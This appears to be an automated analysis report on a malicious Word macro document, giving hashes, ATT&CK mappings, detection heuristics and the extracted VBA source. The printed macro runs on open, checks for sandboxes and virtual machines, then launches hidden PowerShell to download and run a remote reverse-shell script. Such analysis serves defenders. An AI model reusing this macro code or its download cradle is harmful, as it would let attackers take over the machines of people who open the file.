Office (OOXML) malware analysis — malicious · 0082669a065fef00

MALICIOUS

Office (OOXML)

18.1 KB Created: 2021-05-27 11:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-04

MD5: 57a2bbb41925f76ea410e7f2ef0234d3 SHA-1: ea8102e2b6cb09479d6a90091647a9fff782593f SHA-256: 0082669a065fef008552a64666b6dfe97389909d0a5440f04b10676413a31a8a

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information T1071.001 Web Protocols

The sample contains VBA macros, including an AutoOpen macro, that utilize WScript.Shell and CreateObject to execute commands. The script attempts to detect sandboxed or virtualized environments and, if none are found, proceeds to execute a payload. The obfuscated Shell command with a URL indicates the script's intent to download and execute a second-stage payload, likely from a remote source.

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"

Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://192.168.2.120/reverse_shell_120_4444.ps1 Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3283 bytes
SHA-256: `db36a261b523a3d9c4a102f6dea88ada31783b8451ae7618a268258933596f92`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Public Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long Sub AutoOpen() If IsSandBoxiePresent(1) = True Then MsgBox ("OH no Sandboxie is here ...") If IsvirtualboxPresent(1) = True Then MsgBox ("OH no Virtualbox is here ...") If IsvmwarePresent(1) = True Then MsgBox ("OH no VMWare is here ...") If IsSandBoxiePresent(1) = True Then Call SomeSub If IsvirtualboxPresent(1) = True Then Call SomeSub If IsvmwarePresent(1) = True Then Call SomeSub If IsSandBoxiePresent(1) = False Then Call Shello If IsvmwarePresent(1) = False Then Call Shello If IsvirtualboxPresent(1) = False Then Call Shello End Sub Sub msg() MsgBox ("Your are in VM ...") End Sub Function IsvirtualboxPresent(ByVal OptionToCheck As Integer) As Boolean Select Case OptionToCheck Case 1 'Recomendado Dim hSbie As Long hSbie = GetModuleHandle("vmcheck.dll") If hSbie <> 0 Then IsvirtualboxPresent = True Else IsvirtualboxPresent = False End If Case 2 'No recomendado If InStr(MainFrm.Caption, "[#]") <> 0 Then IsvirtualboxPresent = True Else IsvirtualboxPresent = False End If End Select End Function Function IsvmwarePresent(ByVal OptionToCheck As Integer) As Boolean Select Case OptionToCheck Case 1 'Recomendado Dim hSbie As Long hSbie = GetModuleHandle("dbghelp.dll") If hSbie <> 0 Then IsvmwarePresent = True Else IsvmwarePresent = False End If Case 2 'No recomendado If InStr(MainFrm.Caption, "[#]") <> 0 Then IsvmwarePresent = True Else IsvmwarePresent = False End If End Select End Function Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean Select Case OptionToCheck Case 1 'Recomendado Dim hSbie As Long hSbie = GetModuleHandle("SbieDll.dll") If hSbie <> 0 Then IsSandBoxiePresent = True Else IsSandBoxiePresent = False End If Case 2 'No recomendado If InStr(MainFrm.Caption, "[#]") <> 0 Then IsSandBoxiePresent = True Else IsSandBoxiePresent = False End If End Select End Function Function Shello() Set objShell = CreateObject("Wscript.shell") objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')" End Function Sub SomeSub() End 'Code will not execute Debug.Print "SomeSub: Hello after Exit Sub!" End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	16896 bytes
SHA-256: `25e5d9cd9cc5ae6f2ccbbe58500338480dd113bc4a0ab0b14c36a8aebf23c67c`

Open this report in the interactive analyzer, or submit your own file for analysis.